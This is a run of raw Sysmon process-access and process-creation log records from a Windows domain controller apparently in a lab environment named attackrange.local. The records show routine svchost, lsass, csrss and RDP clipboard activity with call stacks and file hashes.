13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.368{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EE04-00000000A301}4120C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-EA04-00000000A301}1372C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.336{59A5CD1D-8E46-6005-0F00-00000000A301}11161260C:\Windows\System32\svchost.exe{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\termsrv.dll+47f71|c:\windows\system32\termsrv.dll+1982c|c:\windows\system32\termsrv.dll+2320b|c:\windows\system32\termsrv.dll+22643|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 154100x800000000000000010102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.333{59A5CD1D-93F9-6005-F004-00000000A301}3900C:\Windows\System32\rdpclip.exe10.0.14393.3503 (rs1_release.200131-0410)RDP Clipboard MonitorMicrosoft® Windows® Operating SystemMicrosoft Corporationrdpclip.exerdpclipC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D887E718FB0F4C99B9F01C5BD59F8B90,SHA256=ACFA1128B4EDD953F6364FA6216337A59C0522A01349263A11259A827838A56F,IMPHASH=5A464814303942D42A66B561CF697F26{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k termsvcs 10341000x800000000000000010101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000010100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 